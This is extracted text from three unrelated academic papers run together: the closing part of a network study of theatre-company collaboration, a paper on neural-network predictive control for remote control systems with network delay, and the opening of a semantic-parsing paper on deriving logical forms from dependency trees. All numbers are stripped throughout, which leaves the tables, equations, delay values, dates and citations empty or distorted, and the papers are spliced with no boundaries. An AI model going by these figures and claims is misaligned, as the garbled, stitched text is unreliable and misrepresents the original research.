. ) ( . ) audience homophily class (nodematch) . . ( . ) ( . ) audience homophily class (nodematch) - . . ( . ) ( . ) audience homophily class (nodematch) . . ( . ) ( . ) school performances (absdiff) . . ( . ) ( . ) reciprocity . ( . ) popularity (gwidegree) - . ( . ) expansiveness (gwodegree) - . ( . ) transitivity (gwesp) . ( . ) hierarchy (gwdsp) - . ( . ) aic . . bic . . standard errors in brackets. values in bold indicate significance at . level economic funding, audience levels and educational activity are variables that con- cern some individual characteristics of the companies. in the second model we added five structural variables in order to control strategic and genetic networking connections insna.org | issues & | volume | for endogenous relational mechanisms. at a general level, model is better speci- fied than model , as shown by aic and bic statistics which show lower values. like model , model also has a significant, though weak, effect of funding. this partially disproves hypothesis . in fact, if tie formation was independent from funding we would expect no effect at all. we see from one side no relation between funding and out degree, meaning that companies have outgoing relations regard- less of the different levels of public fund- ing they get; but on the other side incom- ing relations are somehow supported by higher levels of public contribution. this does not indicate a generalized influence of the funding on the tendency to connect with others, but probably a particular char- acteristic of the field that concerns a higher dependency of hosting institutions on pub- lic economic resources (probably the big and famous theatres we mentioned before). compared to model , in model also audience homophily for class is pos- itive and significant, meaning that, when controlling for endogenous mechanisms, the tendency to host one another emerges also for small companies. this result con- firms hypothesis , reinforcing the vision of a field in which there is a polarized clus- tering tendency among theatre companies. even if small companies probably aspire to perform in big venues, the whole field is actually characterized by groups of com- panies with similar audience levels which collaborate. this is a sign of what lazars- feld and merton ( ) called ‘status ho- mophily’, a process that leads people or organizations to connect with others of close social standing to themselves. reciprocity is positive and signifi- cant, this indicates that in the network of theatre hospitality, if one company hosts another one for a show it, in turn, will probably be hosted by the other company. these mechanisms of tie reciprocation show the presence of diffused collabora- tion exchange, confirming hypothesis . the model has good convergence. in appendix a we attach the gof diagnostic graphs. the negative and significant coeffi- cient for popularity (gwidegree) indi- cates that there is not much variation among hosting companies in their tenden- cy to attract others, meaning that there is a quite uniform distribution of incoming re- lations in the field. in the previous section we showed a high centralization coeffi- cient, indicating that there are some com- panies that attract ties more than others, but probably this characteristic involves a minor part of the relations, making the in degree distribution not particularly skewed. the non-significant coefficient for expansiveness (gwodegree) suggests there is no clear tendency for some com- panies to be disproportionally central per- formers, again showing a structure of the field not particularly dominated by a few central companies. gwdsp, used as a measure of hi- erarchy in the network, is negative but not significant; while transitivity is positive and significant. this shows the existence of clustered social relations, confirming hypothesis , in which company a and company b, which share a tie, will both probably be connected to company c. . discussion and conclusions hospitality in theatre is an inherently rela- tional phenomenon, and with their links the companies shape the local cultural of- fer. the analyses in the present article have contributed to show the relevance of the network perspective on a cultural field, and the fact that where there are relations among the subjects involved, we can effec- tively use formal methods to describe their strategic and genetic elements. to go back to our starting ques- tions, what do we know about theatre companies that collaborate? first of all we know that they do it. more precisely we know that companies which get more pub- lic funding tend to host more; we know there is a homophily effect based on audi- ence levels, and this polarizes the field into two separated groups of big and small companies which connect within their connections strategic and genetic networking | volume | issues & | insna.org group but not between the groups; we know that companies tend to reciprocally perform in one another’s venues and their relations are transitive, forming clusters of close collaborations. a description of the field based on- ly on individual attributes would not be sufficient to understand the way in which cultural agents occupy specific positions within the social space of the cultural pro- duction in a local territory. in our analyses model , compared to model , provides a more articulated image of the network, in which there are some endogenous mecha- nisms, such as reciprocity and transitivity, which contribute to shape the local cultural offer. these results, even though they come from a particular case, add some knowledge to our understanding of the cul- tural field. all the theoretical perspectives in line with a relational look on culture may be effectively integrated by the use of formal network methods. the idea of net- works as a complementary resource held by the cultural producers echoes bour- dieu’s definition of social capital. it is known that pierre bourdieu did not sympa- thize with network analysis; rather than looking for visible and direct links he aimed to capture invisible and objective social relations. technically bourdieu pur- sued this goal by using methods for detect- ing latent dimensions, such as the famous application of multiple correspondence analysis on tastes. but today in sociologi- cal and methodological literature there are empirical demonstrations of the compati- bility of the two approaches. as de nooy ( ) states, concrete relations (like the ones analyzed by social network analysis) may be useful to identify deeper field rela- tions; or, following bottero and crossley ( ), shared habitus can be explained by means of social processes such as mutual influence, which take place among people who also share interaction and concrete re- lationships. in our case we have shown that collaborative relations may support the ar- tistic activity of companies which look for venues in which to perform: companies who are able to convert their relations into shows get better chances in the market. this is close to an interpretation in terms of social capital conversion into economic capital, a hypothesis which would be in line with the bourdesian repertoire. furthermore, the aspects related to the ways in which theatre companies con- nect, forming reciprocal collaborations and closed triads, constitute genetic character- istics of cultural markets. these can inte- grate the analysis of the production of cul- ture perspective concerning the influence of the industry structure on the presence of particular products on the market. this is certainly an interesting topic, and one that is open to future research, because it bridg- es the analysis of production to the analy- sis of consumption. a possible future re- search question is: is there a relation be- tween the ways in which the producers re- late to each other and the types of products that they will offer? this topic was partial- ly addressed by paul dimaggio ( ) who proposed an approach to the study of cultural products starting from the knowledge of the market structure and productive processes. integrating such an approach with network insights would cer- tainly lead to innovative discoveries. last but not least, the relational di- mension of cultural production is a useful issue also for policy research. we know that networks support producers’ activity in many ways, providing resources, infor- mation, collaborations and so forth. a greater attention of policy makers to the re- lational dimension of cultural markets may encourage institutionalization processes aimed at diffusing the benefits of network- ing also to more isolated subjects and, like- ly, at integrating the lack of public eco- nomic resources. strategic and genetic networking connections insna.org | issues & | volume | references bagdadli, s. ( ). museum and theatre networks in italy: determinants and typology. international journal of arts management, ( ), pp. – . bastian m., heymann s., jacomy m. ( ). gephi: an open source software for exploring and manipu- lating networks. international aaai conference on weblogs and social media. becker, h.s. ( ). art worlds. university of cali- fornia press, berkeley. bertacchini, e., santagata, w. ( ). atmosfera crea- tiva. il mulino, bologna. blondel, v.d., jean-loup, g., lambiotte, r., lefebvre, e. ( ). fast unfolding of communi- ties in large networks. journal of statistical me- chanics: theory and experiment, ( ), p. . borgatti, s.p., everett, m.g., freeman, l.c. ( ). ucinet for windows: software for social network analysis. analytic technologies. harvard, ma. available at: https://sites.google.com/site/ucinetsoftware/home bottero, w., crossley, n. ( ). worlds, fields and networks: becker, bourdieu and the structures of social relations. cultural sociology ( ), pp. – . bourdieu, p., ( ). the forms of capital. in richard- son, j.g. (ed.), handbook of theory and research for the sociology of education. greenwood, new york, ny, pp. – . crossley, n. ( ). pretty connected: the social network of the early uk punk movement. theo- ry, culture & society, ( ), pp. – . crossley, n. ( ). the man whose web expanded: network dynamics in manchester’s post/punkmusic scene – . poetics, ( ), pp. – . crossley, n., mcandrew, s., widdop, p. ( ). so- cial networks and music worlds. routledge, new york. d’ovidio, m. ( ). network locali nell’economia cognitiva-culturale. il caso di milano. rassegna italiana di sociologia, , pp. – . de nooy, w. ( ). fields and networks: corre- spondence analysis and social network analysis in the framework of field theory. poetics ( ), pp. – . dimaggio, p. ( ). market structure, the creative process and popular culture: toward an organiza- tional reinterpretation of mass-culture theory. journal of popular culture, ( ), pp. – . fox, e. ( ). bourdieu’s relational view of inter- actions: a reply to bottero and crossley. cultural sociology, ( ), pp. – . gallelli, a. ( ). social structure and cultural pro- duction: an empirical analysis of festivals' net- works. the journal of arts management, law, and society, ( ), pp. – . granovetter, m. ( ). economic action, social structure: the problem of embeddedness. ameri- can journal of sociology, , pp. – . handcock, m.s., hunter, d.r., butts, c.t., goodreau, s.m., & morris, m. ( ). statnet: software tools for the representation, visualization, analysis and simulation of network data. journal of statistical software, ( ), p. . lazarsfeld, p.f., merton, r.k. ( ). friendship as a social process: a substantive and methodological analysis. in freedom and control in modern soci- ety. m berger, t. abel and c. page (eds), pp. – . new york: van nostrand. lusher, d., koskinen, j., robins, g. ( ). exponen- tial random graph models for social networks. theory, methods, and applications. cambridge university press, cambridge. mclean, p. ( ). culture in networks. john wiley & sons, hoboken. mcpherson, m., smith-lovin, l., cook, j.m. ( ). birds of a feather: homophily in social networks. annual review of sociology, , pp. – . milgram, s. ( ). the small world problem. psy- chology today, ( ), pp. – . mizzau, l., montanari, f. ( ). ‘cultural districts and the challenge of authenticity: the case of piedmont, italy’. journal of economic geography, n. , pp. – . peterson, a., anand, n. ( ). the production of culture perspective. annual review of sociology, , pp. – . robins, g., pattison, p., kalish, y., lusher, d. ( ). an introduction to exponential random graph (p*) models for social networks. social networks, , pp. – . santagata, w. ( ). cultural districts, property rights and sustainable economic growth. interna- tional journal of urban and regional research, n. , pp. – . starkey, k., barnatt, c., tempest, s., . beyond networks and hierarchies: latent organizations in the uk television industry. organization science, ( ), pp. – . trigilia, c. ( ). la costruzione sociale dell’innovazione. economia, società e territorio. firenze university press, firenze. uzzi, b., spiro, j. ( ). collaboration and creativi- ty: the small world problem. american journal of sociology, ( ), pp. – . white, h. ( ). where do markets come from? american journal of sociology, , pp. – . widdop, p. ( ). music consumption: networks and omnivorism. in crossley, mcandrew, widdop (eds). social networks and music worlds. routledge, new york connections strategic and genetic networking | volume | issues & | insna.org appendix a figure a: goodness of fit plots, model strategic and genetic networking connections insna.org | issues & | volume | figure b: goodness of fit plots, model connections strategic and genetic networking | volume | issues & | insna.org figure c: diagnostics model international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - research of network closed-loop control system based on the model predictive control xu shuping school of computer science & engineering xi’an technological university xi’an, , china e-mail: @qq.com wang shuang school of computer science & engineering xi’an technological university xi’an, , china guo yu school of computer science & engineering xi’an technological university xi’an, , china su xiaohui school of computer science & engineering xi’an technological university xi’an, , china abstract—uncertainty latency of the remote closed-loop control system in information transmission through internet, analysis delays how to influence closed-loop control system. based on predictive control method of neural network, research the application of closed-loop control system control methods under a random network delay. simulation results show that: this method is able to reflect and predict the delay characteristics of between network path represented by the measured data, and can be replace actual network to research in application based on internet closed-loop control system; the methods used is fast and accurate, it can be used for online learning network model and predict the network delay value, provides a new way of remote closed-loop control based on internet. keywords-remote control; neural network; network delay; model predictive control i. introduction the remote control system is an integration of control technology and network communication technology, it applications in many fields more and more common as ocean development, space station maintenance, remote surgery, virtual reality in recent years, and stable, fast, accurate is the highest target remote control system pursue[ ]. closed-loop controller is to control by the disturbances of feedback, which is by comparative behavior of the system output and the deviation between expectations to make the appropriate control action to eliminate the bias in order to achieve the desired system performance. it has the ability to suppress interference, is not sensitive to changes in device characteristics, and can improve the response characteristics of the system. the delay phenomenon exist in the field of remote control is a common problem exists in the remote closed-loop control applications. delay does not only exist in the before control channel of system and in feedback channel. the delay in before control channel makes the control signal unable to act on the controlled object, the delay in the feedback channel makes the controller can not found the change of controlled object immediately[ ]. mailto:xusp @ .com international journal of advanced network, monitoring and controls volume , no. , delay value influence by the inherent properties of control information transmission network such as the network structure, the amount of data transmission, the transmission timing and transmission agreements and other factors[ ], the size of the delay values are reasonable from a few hours to several days[ ], the approximate value will bring a big problem of the stability and dynamic quality of the remote control system[ ], analysis and research the delay problems of the remote control system is a long-term in this area. ii. issues propose a. the influence of delay on the stability of remote control system delay has a lot of influence on real-time, accuracy and stability performance of the remote control system. kinetic of equation a single-link robotic arm second-order remote control system as follows[ ]: sin d d u dt dt       among them,  represent the angle of robot arm;  represent the behalf of dc motor torque. simulink block diagram of mechanical arm shown in figure . figure . simulink block diagram of mechanical arm since the forward channel and feedback channel in remote control system is generally the same physical link, the article assumes that the forward channel and feedback channel delay values equal. first set the delay time delay to , that is without delay, adjust the pid parameters (how much) to get the response curve satisfied. secondly, to maintain the constant of the pid parameters, increase the network delay value gradually when the network delay value is set to . s to get feedback curve in figure (a), the performance of the system compared with without delay gradual deterioration this time , when the network latency increased to . s, the feedback curve in figure (b), system becomes a oscillation system, and continue to increase the delay to . s, the feedback curve in figure (c), system response divergence, that is system becomes unstable. it can be seen that increase the delay gradually make the control systems become increasingly unstable. (a) (b) (c) figure . the influence on the stability of the control system from remote control delay international journal of advanced network, monitoring and controls volume , no. , b. research for the stability of remote control system there are a lot of research on the stability improvement of the remote control system, in , ferrel put forward network delay problem of need to pay attention to time-varying in the network control [ ]. halevi and ray in the literature[ ] augmented deterministic discrete-time model for the periodic network delay, gregory c. walsh in the literature[ ] considered controller and controlled object is nonlinear time-varying assuming no observation noise, based on nonlinear perturbation method theory, the network delay impact the system is described as a perturbation of the continuous-time systems. walsh and bushnel in the literature [ ] to prove this method and conclusions can applicable equally to linear systems. goktas in the literature [ ] saw sc and ca as a multiplicative uncertainty bounded perturbation and provided the method of use robust control theory design of ncs controller in frequency domain. studied robust passive control problem of class of long delay networked control systems in the literature [ ], and derive the passive controller design method and proved the validity of the method through simulation. short delay network control system disturbs by white noise in the literature[ ], transformed impact of the random delay on the system into the unknown bounded uncertainties using robust control theory give the /h h system state observer design method. literature[ ] make delay uncertainty convert to the perturbation of the closed-loop system parameters, propose the conditions for the existence of robust guaranteed cost control law based on the robust control theory and lyapunov stability principle, and gives the method of design of network control robust guaranteed cost state feedback controller to solve linear matrix inequality. research show that actually adjust the controller parameters pid makes the instability of the closed-loop control system becomes stable and meet the requirements of remote control system which need less real-time demand. modify pid parameters of the control system and set the network delay to . s again get feedback curve shown in figure .research show that modify the pid control parameters has indeed improved the stability of the control system. figure . response after regulate pid parameters at . seconds time delay c. question propose the adjustments of the pid control parameters need to be dynamic adjustment constantly with the size of the control system delay and values and other parameters of systems, which makes controlled object in the work environment unknown to dynamically adapt adjust pid values become remote intelligent control systems that are experiencing another problem. this paper based on the method of modify the control parameters of pid values to improve the stability of the remote control system, and propose intelligent remote control system design methods with adaptive function under a random delay based on neural network theory. iii. question analysis remote control single-link manipulator, set the sampling period in figure is . s, and take the delay value of . s, the control information in time k transmitted to the controller after . s, as opposed to the system sampling time . s, the controller receives status information at the moment of k has pass a sampling point, the state of the system has become the state in time k + , that is state of the k time fed back to the pid controller at time k + , the pid controller for international journal of advanced network, monitoring and controls volume , no. , time k, the state at time k+ has not yet come, but this time system status values at k- after a sample time delay before it is passed controller, therefore, the controller can only decision at time k should be imposed control value u (k) based on the state of the k- times, and this control value can be a real work on the system after a time delay, while at the time k + and the state of the system has been turned into a time k+ the state of x(k+ ), while u (k) produce at the state time k- , so u (k- )grieved and u (k + ) required difference two sampling cycles. in these two sampling cycle, the state of the system state transition, that is x (k- ) transfer to the x (k+ ), x (k- ) and x (k+ ) often is different lead to u (k- ) and u (k + ) is different. in other word, the system control value produced offset and the greater delay the greater offset, which is the root source of result in deterioration of the system closed-loop control performance and even instability. the above analysis shows that the system performance deterioration caused by the remote network delay because of can not correctly calculate the amount of control exerted by the controller to the system ,if the system model is known and the size of delay is known, then forecast the state of system in accordance with the principle of the system predict compensation, and calculate the size of control value need to be added the control system in accordance with the predicted state, that is time k applications to predict the state   (k+ ) at time k+ yet not the state of x(k- ) at time k- calculation to be applied to the system state at time k, then the control value u (k + ) at actual time k + , the u (k + ) after a delay transmission in the time k + transfer to the system just after a sampling period, the state of the system change into x (k + ) , so, if the predicted state   (k+ ) is infinitely close to the actual state x (k + ), the performance of control network delay closed-loop control system can be infinitely close the performance of the closed-loop control system without delay links, which is the basic idea of the predictive control model. however, the delay of the control network is time-varying and controlled objects are often immediately confounding factors, it is can not use an inconvenience model to predict the state of system and can not use a specific delay time to do the fixed step predictive control, neural network has the advantages of online learning the state of the system, predictive control based on neural network has strong robustness to be adaptive to the change of system status and network delay aspects ,it is a way to solve the network latency closed-loop control. iv. build the model predictive control law according to the running state of the system over the past time and present moment, more accurate forecasting system desired output value in the future moment, calculated control value of the system should be added according to output value desired depending on certain optimization algorithm [ ] is adaptive computer control of online solving control value [ ], the method includes three steps: prediction model, rolling optimization and feedback correction[ ]. a. the prediction model for a module description of the alleged object behavior in the predictive control based on neural network belong to forward model of system, there use the training methods as shown in figure , where dashed box picture shows the actual controlled object, here is the simulink block diagram of the robotic arm, at random input signal u to produce output y. selected bp neural network with one hidden layer as training model of a controlled object , set the number of hidden layer neurons is , using the levenberg-marquartdt learning rules, with the group [u, y] data training neural network model of the charged object, the results shown in figure , where figure (a) is the data used for training, figure (b)is convergence diagram for training [ ]. international journal of advanced network, monitoring and controls volume , no. , figure . neural network training block diagram of the manipulator b. receding horizon optimization rolling optimization is an optimal control algorithm, which uses the output of the rolling finite domain optimization that is the goal of optimization over time. predictive control proposes optimization index based on the moment in every time instead of using global optimization indexes. rolling optimization index locality through make it can only get the global optimal solution in the ideal case, but when the model mismatch or time-varying and non-linear or confounding factors can take into account this uncertainty in a timely manner compensate, reducing the deviation, keeping the actual optimal control ,and it is also easy to use input/output value of finite difference time domain to identify rapidly the state of controlled object so as to implement the online adjustment to the control law and need for repeated optimization . (a) data for training (b) convergence diagram for training figure . neural network model training results of manipulator optimization algorithm in this article also uses neural network to achieve, set the time-domain involved in the optimization value of , using the bp network neural of hidden layer neuron number , the same learning rule levenberg-marquartdt do the online training to achieve the control signal to the continuous optimization. training block diagram is shown in the dashed box in figure . neural network optimization device in accordance with a given input signal u produce predictable output u , u is imposed to the neural network model of the controlled object to produce predictable output y , y compare with the desired output u of the system, and both the difference to train the neural network optimization. then, the output u of the e enough litter as the actual amount of control applied to the actual controlled object. visible, the optimizer in the regulation system is the inverse model of the charged object. y can also be compared with actual output y , and the error e and international journal of advanced network, monitoring and controls volume , no. , the actual input u of charged object, output y as the data of training charged object neural network model. c. feedback correction feedback correction is forecast control to keep the dynamic correction forecasting model to ensure that the prediction model with infinitely close to the actual controlled object, and make optimization algorithm establish on the basis of the correct prediction of the system state then the new optimization. error e in figure is the amendment process of the neural network model of the controlled object. neural network prediction model is built on the basis of the past run data in system, the new operating environment and the actual system has the nonlinear, time-varying, interference and other factors make prediction model based on neural networks need to constantly learn to modify their weights and even structure to ensure that it can well represent the actual controlled object to a control signal prediction. v. simulation analyses figure . simulink simulation of network closed-loop control system based on predictive neural build the simulation block diagram shown in figure under robotic arm smulink environment, network training based on neural network predictive control by the steps in figure -figure , and at the role of the same random input signal gradually adjust the value of delay to simulation. the results in figure show that the prediction control based on neural network has a good control performance to the fixed delay network. further used random delay module shown in figure (a) instead of fixed delay module in figure immediately delay module for delay characteristics of input shown in figure (b), where in.mat file stored random input signal in figure .there are used random input signal stored in this file in order to compare the simulation results in the simulation. finally, simulation under the random delay conditions and results shows in figure (c). whether a fixed delay or random delay neural network predictive controller can satisfy the closed-loop control requirements in the network delay conditions. international journal of advanced network, monitoring and controls volume , no. , (a) response curve delay . s (b) response curve delay . s figure . predictive control random responses curve based on neural network (a) delay curve under random delay (b) response curve under random delay figure . responses under random delay vi. conclusion this article discusses the difficulties of remote closed-loop control, that is different from the general control system of the difficulty lies in channel and feedback channel network of system existence uncertain delay which greatly reduces the stability of system and improve the design difficulty of control system. this paper elaborated network closed-loop control problems form uncertain network delay to includes network delay controller design method, and study the impact of network transmission delay on the network closed-loop control system, proposed by predictive control based on neural network to solve feasibility of the network control system which existence random delay closed-loop control, and verified the validity of the method by simulation. acknowledgment the authors wish to thank the cooperators. this research is partially funded by the project funds in. national network engineering testing labfund project(gsysj ). references [ ] zhang wei, michael s,branicky, stephen m, phillips, stability of networked control systems[j], ieee control systems magazine february, ,( ): - . [ ] almutairi naif b, chow moyuen, pi parameterization using adaptive fuzzy modulation (afm) for networked control systems-part i: partial adaptation [j].ieee proceedings of iecon , sevilla,spain, . - . [ ] goodwin c, juan carlos aguero,arie feuer, state estima tion for systems having random measurement delays usingerrors in variables[c], the th triennial world congress barcelona, spain, . international journal of advanced network, monitoring and controls volume , no. , [ ] lee kyung chang,lee suk, remote controller design of networked control system using genetic algorithm[c], isie , pusan, korea in ieee, : - . [ ] huang j q, lew is fl, liu k a, neural predictive control for telerobot swith time delay [j]. journal of intelligent and robotic system s, , : - . [ ] lian fengli analysis, design, modeling, and control of networked control systems[d], ph.d. thesis, the university of michigan, . [ ] ferrelw r.remote manipulation with transmission delay[j]. ieee transaction on human factors in electronics, ,fe -( ): - . [ ] halevi y, ray a.integrated communication and control systems; part i analysis[j]. journal of dynamic systems measurement and control, , ( ): - . [ ] walsh g c,beldiman o,bushnell l g. a symptotic behavior of nonlinear networked control systems[j]. ieee transactions on automatic control, , ( ): - . [ ] gregory c walsh,octavian beldiman,linda bushnell.error encoding algorithms for networdked control systems[c]. proceedings of the th conference on decision and control phoenix, , : - . [ ] göktas f.distributed control of systems over communication networks[d]. ph.d dissertion. philadelphia, pa, usa:university of pennsylvania, . [ ] sun haiyi, li ning. robust passive control of long delay network control system [j]. computing technology and automation, , ( ) : - . [ ] zhu zhangqing, zhou chuan, hu weili. robust hh state observer design of short delay network control systems[j]. control and decision, , ( ) [ ] zhang ximin, li jiandong, zhang jianguo. robust guaranteed cost control of network control systems [j]. xi'an electronic technology university, , ( ): - . [ ] huang j q , lew is fl, liu k a, neural predictive control for telerobot swith time delay [j]. journal of intelligent and robotic system s, , : - . [ ] chen, s, c.f.n. cowan, and p.m. grant, orthogonal least squares learning algorithm for radial basis function networks[j], ieee transactions on neural networks, ( ): - . [ ] huang j q, lew is fl, liu k a, neural predictive control for telerobot swith time delay[j]. journal of intelligent and robotic system s, , : - . [ ] chen, s, c.f.n. cowan, and p.m. grant, orthogonal least squares learning algorithm for radial basis function networks, ieee transactions on neural networks, ( ): - . transforming dependency structures to logical forms for semantic parsing siva reddy†a oscar täckström‡ michael collins‡b tom kwiatkowski‡ dipanjan das‡ mark steedman† mirella lapata† †ilcc, school of informatics, university of edinburgh ‡ google, new york siva.reddy@ed.ac.uk {oscart, mjcollins, tomkwiat, dipanjand}@google.com {steedman, mlap}@inf.ed.ac.uk abstract the strongly typed syntax of grammar for- malisms such as ccg, tag, lfg and hpsg offers a synchronous framework for deriving syntactic structures and semantic logical forms. in contrast—partly due to the lack of a strong type system—dependency structures are easy to annotate and have become a widely used form of syntactic analysis for many languages. however, the lack of a type system makes a formal mechanism for deriving logical forms from dependency structures challenging. we address this by introducing a robust system based on the lambda calculus for deriving neo- davidsonian logical forms from dependency trees. these logical forms are then used for semantic parsing of natural language to free- base. experiments on the free and web- questions datasets show that our representation is superior to the original dependency trees and that it outperforms a ccg-based representa- tion on this task. compared to prior work, we obtain the strongest result to date on free and competitive results on webquestions. introduction semantic parsers map sentences onto logical forms that can be used to query databases (zettlemoyer and collins, ; wong and mooney, ), instruct robots (chen and mooney, ), extract information (krishnamurthy and mitchell, ), or describe vi- sual scenes (matuszek et al., ). current systems accomplish this by learning task-specific grammars (berant et al., ), by using strongly-typed ccg grammars (reddy et al., ), or by eschewing the use of a grammar entirely (yih et al., ). awork carried out during an internship at google. b on leave from columbia university. disney acquired pixar nnp vbd nnp nsubj dobjroot (a) the dependency tree for disney acquired pixar. (nsubj (dobj acquired pixar) disney) (b) the s-expression for the dependency tree. λx.∃yz. acquired(xe) ∧ disney(ya) ∧ pixar(za) ∧arg (xe,ya) ∧ arg (xe,za) (c) the composed lambda-calculus expression. figure : the dependency tree is binarized into its s-expression, which is then composed into the lambda expression representing the sentence logical form. in recent years, there have been significant ad- vances in developing fast and accurate dependency parsers for many languages (mcdonald et al., ; nivre et al., ; martins et al., , inter alia). motivated by the desire to carry these advances over to semantic parsing tasks, we present a robust method for mapping dependency trees to logical forms that represent underlying predicate-argument structures. we empirically validate the utility of these logical forms for question answering from databases. since our approach uses dependency trees as input, we hy- pothesize that it will generalize better to domains that are well covered by dependency parsers than methods that induce semantic grammars from scratch. the system that maps a dependency tree to its log- ical form (henceforth deplambda) is illustrated in figure . first, the dependency tree is binarized via an obliqueness hierarchy to give an s-expression that describes the application of functions to pairs by “robust”, we refer to the ability to gracefully handle parse errors as well as the untyped nature of dependency syntax. transactions of the association for computational linguistics, vol. , pp. – , . action editor: christopher potts. submission batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. mailto:siva.reddy@ed.ac.uk mailto:oscart@google.com mailto:mjcollins@google.com mailto:tomkwiat@google.com mailto:dipanjand@google.com mailto:steedman@inf.ed.ac.uk mailto:mlap@inf.ed.ac.uk of arguments. each node in this s-expression is then substituted for a lambda-calculus expression and the relabeled s-expression is beta-reduced to give the log- ical form in figure (c). since dependency syntax does not have an associated type theory, we introduce a type system that assigns a single type to all con- stituents, thus avoiding the need for type checking (section ). deplambda uses this system to gener- ate robust logical forms, even when the dependency structure does not mirror predicate-argument relation- ships in constructions such as conjunctions, prepo- sitional phrases, relative clauses, and wh-questions (section ). these ungrounded logical forms (kwiatkowski et al., ; reddy et al., ; krishnamurthy and mitchell, ) are used for question answer- ing against freebase, by passing them as input to graphparser (reddy et al., ), a system that learns to map logical predicates to freebase, result- ing in grounded freebase queries (section ). we show that our approach achieves state-of-the-art per- formance on the free dataset and competitive performance on the webquestions dataset, whereas building the freebase queries directly from depen- dency trees gives significantly lower performance. finally, we show that our approach outperforms a di- rectly comparable method that generates ungrounded logical forms using ccg. details of our experimen- tal setup and results are presented in section and section , respectively. logical forms we use a version of the lambda calculus with three base types: individuals (ind), events (event), and truth values (bool). roughly speaking individuals are introduced by nouns, events are introduced by verbs, and whole sentences are functions onto truth values. for types a and b, we use a×b to denote the product type, while a → b denotes the type of functions mapping elements of a to elements of b. we will make extensive use of variables of type ind × event. for any variable x of type ind × event, we use x = (xa,xe) to denote the pair of variables xa (of type ind) and xe (of type event). here, the subscript denotes the projections ·a : ind× event → ind and ·e : ind×event → event. an important constraint on the lambda calculus system is as follows: all natural language con- stituents have a lambda-calculus expression of type ind×event → bool. a “constituent” in this definition is either a sin- gle word, or an s-expression. s-expressions are defined formally in the next section; examples are (dobj acquired pixar) and (nsubj (dobj acquired pixar) disney). essen- tially, s-expressions are binarized dependency trees, which include an ordering over the different dependencies to a head (in the above the dobj modifier is combined before the nsubj modifier). some examples of lambda-calculus expressions for single words (lexical entries) are as follows: acquired ⇒ λx. acquired(xe) disney ⇒ λy. disney(ya) pixar ⇒ λz. pixar(za) an example for a full sentence is as follows: disney acquired pixar ⇒ λx.∃yz. acquired(xe) ∧ disney(ya) ∧pixar(za) ∧ arg (xe,ya) ∧ arg (xe,za) this is a neo-davidsonian style of analysis. verbs such as acquired make use of event variables such as xe, whereas nouns such as disney make use of individual variables such as ya. the restriction that all expressions are of type ind × event → bool simplifies the type system considerably. while it leads to difficulty with some linguistic constructions—see section . for some examples—we believe the simplicity and robustness of the resulting system outweighs these concerns. it also leads to some spurious variables that are bound by lambdas or existentials, but which do not appear as arguments of any predicate: for example in the above analysis for disney acquired pixar, the variables xa, ye and ze are unused. however these “spurious” vari- ables are easily identified and discarded. an important motivation for having variables of type ind×event is that a single lexical item some- times makes use of both types of variables. for exam- ple, the noun phrase president in has semantics λx.∃y. president(xa) ∧ president event(xe)∧ arg (xe,xa) ∧ (ya) ∧ prep.in(xe,ya) in this example president introduces the predi- cates president, corresponding to an individual, and president event, corresponding to an event; essen- tially a presidency event that may have various prop- erties. this follows the structure of freebase closely: freebase contains an individual corresponding to barack obama, with a president property, as well as an event corresponding to the obama presidency, with various properties such as a start and end date, a location, and so on. the entry for president is then λx. president(xa) ∧ president event(xe) ∧ arg (xe,xa) note that proper nouns do not introduce an event predicate, as can be seen from the entries for disney and pixar above. dependency structures to logical forms we now describe the system used to map dependency structures to logical forms. we first give an overview of the approach, then go into detail about various linguistic constructions. . an overview of the approach the transformation of a dependency tree to its logical form is accomplished through a series of three steps: binarization, substitution, and composition. below, we outline these steps, with some additional remarks. binarization. a dependency tree is mapped to an s-expression (borrowing terminology from lisp). for example, disney acquired pixar has the s-expression (nsubj (dobj acquired pixar) disney) formally, an s-expression has the form (exp exp exp ), where exp is a dependency label, and both exp and exp are either ( ) a word such as acquired ; or ( ) an s-expression such as (dobj acquired pixar). we refer to the process of mapping a dependency tree to an s-expression as binarization, as it involves an ordering of modifiers to a particular head, similar to binarization of a context-free parse tree. substitution. each symbol (word or label) in the s-expression is assigned a lambda expression. in our running example we have the following assignments: acquired ⇒ λx. acquired(xe) disney ⇒ λy. disney(ya) pixar ⇒ λz. pixar(za) nsubj ⇒ λfgz.∃x.f(z) ∧g(x) ∧ arg (ze,xa) dobj ⇒ λfgz.∃x.f(z) ∧g(x) ∧ arg (ze,xa) composition. beta-reduction is used to compose the lambda-expression terms to compute the final semantics for the input sentence. in this step expres- sions of the form (exp exp exp ) are interpreted as function exp being applied to arguments exp and exp . for example, (dobj acquired pixar) re- ceives the following expression after composition: λz.∃x. acquired(ze) ∧ pixar(xa) ∧ arg (ze,xa) obliqueness hierarchy. the binarization stage re- quires a strict ordering on the different modifiers to each head in a dependency parse. for example, in (nsubj (dobj acquired pixar) disney), the dobj is attached before the nsubj. the ordering is very similar to the obliqueness hierarchy in syntactic for- malisms such as hpsg (pollard and sag, ). type for dependency labels. recall from sec- tion that every s-expression subtree receive a log- ical form of type η = ind × event → bool. it follows that in any s-expression (exp exp exp ), exp has type η → (η → η), exp and exp both have type η, and the full expression has type η. since each labeled dependency relation (e.g., nsubj, dobj, partmod) is associated with exp in connecting two s-expression subtrees, dependency labels always re- ceive expressions of type η → (η → η). mirroring dependency structure. whenever a dependency label receives an expression of the form λfgz.∃x.f(z) ∧g(x) ∧ rel(ze,xa) ( ) where rel is a logical relation, the composition op- eration builds a structure that essentially mirrors the original dependency structure. for example nsubj and dobj receive expressions of this form, with rel = arg and rel = arg , respectively; the final lambda expression for disney acquired pixar is λx.∃yz. acquired(xe) ∧ disney(ya) ∧pixar(za) ∧ arg (xe,ya) ∧ arg (xe,za) this structure is isomorphic to the original depen- dency structure: there are variables xe, ya and za corresponding to acquired, disney and pixar, respectively; and the sub-expressions arg (xe,ya) and arg (xe,za) correspond to the dependencies ac- quired → disney and acquired → pixar. by default we assume that the predicate argument structure is isomorphic to the dependency structure and many dependency labels receive a semantics of the form shown in ( ). however, there are a num- ber of important exceptions. as one example, the dependency label partmod receives semantics λfgz.∃x.f(z) ∧g(x) ∧ arg (xe,za) with arg (xe,za) in place of the arg (ze,xa) in ( ). this reverses the dependency direction to capture the predicate-argument structure of reduced relative constructions such as a company acquired by disney. post-processing. we apply three post-processing steps—simple inferences over lambda-calculus expressions—to the derived logical forms. these relate to the handling of prepositions, coordination and control and are described and motivated in more detail under the respective headings below. . analysis of some linguistic constructions in this section we describe in detail how various lin- guistic constructions not 